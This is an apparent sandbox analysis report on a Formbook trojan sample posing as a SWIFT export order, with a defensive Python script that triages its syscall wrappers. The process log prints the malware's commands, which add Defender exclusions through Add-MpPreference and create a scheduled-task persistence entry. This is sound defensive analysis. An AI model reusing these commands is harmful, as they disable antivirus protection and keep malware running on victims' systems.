Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041874A NtClose, 8_2_0041874A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041871A NtClose, 8_2_0041871A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004187CB NtAllocateVirtualMemory, 8_2_004187CB
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409540 NtReadFile,LdrInitializeThunk, 8_2_01409540
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01409910
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014095D0 NtClose,LdrInitializeThunk, 8_2_014095D0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014099A0 NtCreateSection,LdrInitializeThunk, 8_2_014099A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409840 NtDelayExecution,LdrInitializeThunk, 8_2_01409840
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01409860
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014098F0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_014098F0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409710 NtQueryInformationToken,LdrInitializeThunk, 8_2_01409710
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409FE0 NtCreateMutant,LdrInitializeThunk, 8_2_01409FE0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409780 NtMapViewOfSection,LdrInitializeThunk, 8_2_01409780
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014097A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_014097A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409A50 NtCreateFile,LdrInitializeThunk, 8_2_01409A50
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01409660
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409A00 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_01409A00
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409A20 NtResumeThread,LdrInitializeThunk, 8_2_01409A20
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014096E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_014096E0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409950 NtQueueApcThread, 8_2_01409950
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409560 NtWriteFile, 8_2_01409560
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409520 NtWaitForSingleObject, 8_2_01409520
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140AD30 NtSetContextThread, 8_2_0140AD30
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014099D0 NtCreateProcessEx, 8_2_014099D0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014095F0 NtQueryInformationFile, 8_2_014095F0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140B040 NtSuspendThread, 8_2_0140B040
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409820 NtEnumerateKey, 8_2_01409820
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014098A0 NtWriteVirtualMemory, 8_2_014098A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409760 NtOpenProcess, 8_2_01409760
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409770 NtSetInformationFile, 8_2_01409770
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140A770 NtOpenThread, 8_2_0140A770
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409B00 NtSetValueKey, 8_2_01409B00
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140A710 NtOpenProcessToken, 8_2_0140A710
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409730 NtQueryVirtualMemory, 8_2_01409730
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140A3B0 NtGetContextThread, 8_2_0140A3B0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409650 NtQueryValueKey, 8_2_01409650
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409670 NtQueryInformationProcess, 8_2_01409670
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409610 NtEnumerateValueKey, 8_2_01409610
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409A10 NtQuerySection, 8_2_01409A10
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014096D0 NtCreateKey, 8_2_014096D0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409A80 NtOpenDirectoryObject, 8_2_01409A80
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9A50 NtCreateFile,LdrInitializeThunk, 20_2_02FA9A50
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9860 NtQuerySystemInformation,LdrInitializeThunk, 20_2_02FA9860
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9840 NtDelayExecution,LdrInitializeThunk, 20_2_02FA9840
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA99A0 NtCreateSection,LdrInitializeThunk, 20_2_02FA99A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 20_2_02FA9910
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 20_2_02FA96E0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA96D0 NtCreateKey,LdrInitializeThunk, 20_2_02FA96D0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 20_2_02FA9660
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9650 NtQueryValueKey,LdrInitializeThunk, 20_2_02FA9650
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9FE0 NtCreateMutant,LdrInitializeThunk, 20_2_02FA9FE0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9780 NtMapViewOfSection,LdrInitializeThunk, 20_2_02FA9780
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9710 NtQueryInformationToken,LdrInitializeThunk, 20_2_02FA9710
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA95D0 NtClose,LdrInitializeThunk, 20_2_02FA95D0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9540 NtReadFile,LdrInitializeThunk, 20_2_02FA9540
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9A80 NtOpenDirectoryObject, 20_2_02FA9A80
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9A20 NtResumeThread, 20_2_02FA9A20
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9A10 NtQuerySection, 20_2_02FA9A10
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9A00 NtProtectVirtualMemory, 20_2_02FA9A00
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAA3B0 NtGetContextThread, 20_2_02FAA3B0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9B00 NtSetValueKey, 20_2_02FA9B00
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA98F0 NtReadVirtualMemory, 20_2_02FA98F0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA98A0 NtWriteVirtualMemory, 20_2_02FA98A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAB040 NtSuspendThread, 20_2_02FAB040
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9820 NtEnumerateKey, 20_2_02FA9820
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA99D0 NtCreateProcessEx, 20_2_02FA99D0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9950 NtQueueApcThread, 20_2_02FA9950
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9670 NtQueryInformationProcess, 20_2_02FA9670
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9610 NtEnumerateValueKey, 20_2_02FA9610
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA97A0 NtUnmapViewOfSection, 20_2_02FA97A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAA770 NtOpenThread, 20_2_02FAA770
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9770 NtSetInformationFile, 20_2_02FA9770
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9760 NtOpenProcess, 20_2_02FA9760
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9730 NtQueryVirtualMemory, 20_2_02FA9730
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAA710 NtOpenProcessToken, 20_2_02FAA710
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA95F0 NtQueryInformationFile, 20_2_02FA95F0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9560 NtWriteFile, 20_2_02FA9560
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAAD30 NtSetContextThread, 20_2_02FAAD30
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9520 NtWaitForSingleObject, 20_2_02FA9520
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C85F0 NtCreateFile, 20_2_006C85F0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C86A0 NtReadFile, 20_2_006C86A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C8720 NtClose, 20_2_006C8720
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C87D0 NtAllocateVirtualMemory, 20_2_006C87D0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C874A NtClose, 20_2_006C874A
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C871A NtClose, 20_2_006C871A
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C87CB NtAllocateVirtualMemory, 20_2_006C87CB
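The native-call list above is static evidence: it records where the sandbox found wrappers for Nt* system calls, not that each was invoked. Two things in it are worth extracting before reading any further. First, every process carries two clusters of wrappers: one inside the payload image (PID 8 at 0x0041xxxx, PID 20 at 0x006Cxxxx, exactly 0x2B0000 higher, which is the same image rebased to 0x6B0000, the address of the Formbook YARA hit in the help.exe dump) and one the report pairs with LdrInitializeThunk (PID 8 at 0x0140xxxx, PID 20 at 0x02FAxxxx, rebased by 0x1BA0000). The second cluster lies outside the payload image, and together with the "OriginalFilename ntdll.dll" strings found in PID 8 memory further down it is consistent with the payload resolving syscalls from a privately mapped ntdll copy; the report does not prove that on its own. Second, the union of wrappers per process covers the full API sets behind the report's behavioural signatures (process hollowing, APC queueing, thread-context modification). The script below is an added triage example, not part of the report or of any Joe Sandbox tooling: it parses the report's own "Code function:" lines (a constructed subset is embedded), tests each process against analyst-defined fingerprints (the fingerprint sets are an assumption, not a standard), and recovers the rebase deltas between the two processes.

```python
"""Triage the Nt* wrappers a sandbox resolved per process and map them to
injection-technique fingerprints. Added example; not part of the report."""
import re
from collections import Counter, defaultdict

# Constructed input: 'Code function:' lines copied from the report above
# (PID 8 = unpacked sample, PID 20 = help.exe). Real reports have many more.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004185F0 NtCreateFile, 8_2_004185F0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004186A0 NtReadFile, 8_2_004186A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00418720 NtClose, 8_2_00418720
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004187D0 NtAllocateVirtualMemory, 8_2_004187D0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014095D0 NtClose,LdrInitializeThunk, 8_2_014095D0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014099A0 NtCreateSection,LdrInitializeThunk, 8_2_014099A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409780 NtMapViewOfSection,LdrInitializeThunk, 8_2_01409780
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014097A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_014097A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409A50 NtCreateFile,LdrInitializeThunk, 8_2_01409A50
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01409660
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409A20 NtResumeThread,LdrInitializeThunk, 8_2_01409A20
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409950 NtQueueApcThread, 8_2_01409950
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140AD30 NtSetContextThread, 8_2_0140AD30
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140B040 NtSuspendThread, 8_2_0140B040
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_014098A0 NtWriteVirtualMemory, 8_2_014098A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01409760 NtOpenProcess, 8_2_01409760
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140A770 NtOpenThread, 8_2_0140A770
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0140A3B0 NtGetContextThread, 8_2_0140A3B0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9A50 NtCreateFile,LdrInitializeThunk, 20_2_02FA9A50
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA99A0 NtCreateSection,LdrInitializeThunk, 20_2_02FA99A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 20_2_02FA9660
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9780 NtMapViewOfSection,LdrInitializeThunk, 20_2_02FA9780
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA95D0 NtClose,LdrInitializeThunk, 20_2_02FA95D0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9A20 NtResumeThread, 20_2_02FA9A20
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAA3B0 NtGetContextThread, 20_2_02FAA3B0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA98A0 NtWriteVirtualMemory, 20_2_02FA98A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAB040 NtSuspendThread, 20_2_02FAB040
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9950 NtQueueApcThread, 20_2_02FA9950
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA97A0 NtUnmapViewOfSection, 20_2_02FA97A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAA770 NtOpenThread, 20_2_02FAA770
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FA9760 NtOpenProcess, 20_2_02FA9760
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FAAD30 NtSetContextThread, 20_2_02FAAD30
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C85F0 NtCreateFile, 20_2_006C85F0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C86A0 NtReadFile, 20_2_006C86A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C8720 NtClose, 20_2_006C8720
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C87D0 NtAllocateVirtualMemory, 20_2_006C87D0
"""

# "<pid>_<run>_<hex address> Name1,Name2," as the sandbox prints it.
LINE_RE = re.compile(r"Code function: (\d+)_\d+_([0-9A-Fa-f]+) ((?:\w+,)+)")

# Analyst heuristics (assumption, not a standard): a technique counts as
# "covered" when every listed syscall wrapper was resolved in the process.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtAllocateVirtualMemory",
                          "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtOpenProcess", "NtOpenThread", "NtWriteVirtualMemory",
                      "NtQueueApcThread"},
    "section remapping": {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread",
                              "NtSetContextThread", "NtResumeThread"},
}


def parse_calls(lines):
    """Return {pid: {api_name: {addresses}}}; non-Nt names such as
    LdrInitializeThunk are dropped."""
    calls = defaultdict(lambda: defaultdict(set))
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        pid, addr = int(m.group(1)), int(m.group(2), 16)
        for name in filter(None, m.group(3).split(",")):
            if name.startswith("Nt"):
                calls[pid][name].add(addr)
    return calls


def matched_techniques(api_names):
    """Fingerprints fully covered by the given resolved Nt* API names."""
    seen = set(api_names)
    return [t for t, required in TECHNIQUES.items() if required <= seen]


def rebase_deltas(calls_a, calls_b, min_hits=3):
    """Address deltas (b - a) shared by at least min_hits APIs: each such delta
    is one code region present in both processes at a different base."""
    hits = Counter()
    for name in calls_a.keys() & calls_b.keys():
        for a in calls_a[name]:
            for b in calls_b[name]:
                hits[b - a] += 1
    return {delta for delta, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    calls = parse_calls(SAMPLE_LINES.splitlines())
    for pid, apis in sorted(calls.items()):
        print(f"PID {pid}: {len(apis)} Nt* wrappers -> {matched_techniques(apis)}")
    for delta in sorted(rebase_deltas(calls[8], calls[20])):
        print(f"region shared by PID 8 and PID 20, rebased by +0x{delta:X}")
```

Feed the whole report section to parse_calls to get the full picture; the two deltas it recovers (0x2B0000 and 0x1BA0000) tell you which memory dump to pull for each region, and a fingerprint that is covered here should still be confirmed against the dynamic behaviour signatures before it is written up as an observed technique.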
Sample file is different than original file name gathered from version info
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Binary or memory string: OriginalFilename vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.262565028.00000000007E2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000003.238266998.000000000720E000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.265407210.0000000005C30000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.265647076.0000000005F90000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353532686.000000000164F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.352548275.00000000008F2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353038587.0000000000F74000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.264038334.000000000131F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Binary or memory string: OriginalFilenameUTF8Encodi.exe. vs TT_SWIFT_Export Order_noref S10SMG00318021.exe
PE file contains strange resources
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AnsPejV.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: AnsPejV.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe ReversingLabs: Detection: 35%
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe File read: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe:Zone.Identifier
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe File created: C:\Users\user\AppData\Roaming\AnsPejV.exe
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe File created: C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@16/10@9/4
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
